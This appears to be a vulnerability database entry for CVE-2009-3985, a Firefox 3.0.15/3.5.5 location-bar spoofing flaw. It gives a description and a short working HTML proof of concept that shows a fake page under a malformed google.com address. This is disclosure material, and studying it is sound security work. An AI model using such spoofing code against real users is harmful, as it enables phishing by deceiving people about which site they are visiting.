Lucene search
K

Mozilla Firefox Location Bar Spoofing Vulnerability

🗓️ 18 Dec 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 30 Views

Mozilla Firefox Location Bar Spoofing Vulnerabilit

Related
Code

                                                # Exploit Title: MOZILLA FIREFOX LOCATION BAR SPOOFING VULNERABILITY
# Date: 2009-12-18
# Author: Jordi Chancel
# Software Link: http://www.mozilla.org/security/announce/2009/mfsa2009-69.html
# Version: Mozilla Firefox 3.0.15 & 3.5.5
# Tested on: Windows XP-VISTA-SEVEN & LINUX BACKTRACK
# CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3985
# DESCRIPTION: {
#		Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44
#		in which a web page can set document.location to a URL that can't be displayed properly and then inject 
#		content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking 
#		but invalid URL in the location bar and inject HTML and JavaScript into the body of the 
#		page, resulting in a spoofing attack.  }
# Code :
<html>
<title>FAKE PAGE</title>
<body onload="javascript:window.location = 'https://www.google.com%20';window.stop();void(0);">
<h1>FAKE PAGE</h1>
</body>
</html>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Dec 2009 00:00Current
9.7High risk
Vulners AI Score9.7
EPSS0.02539
30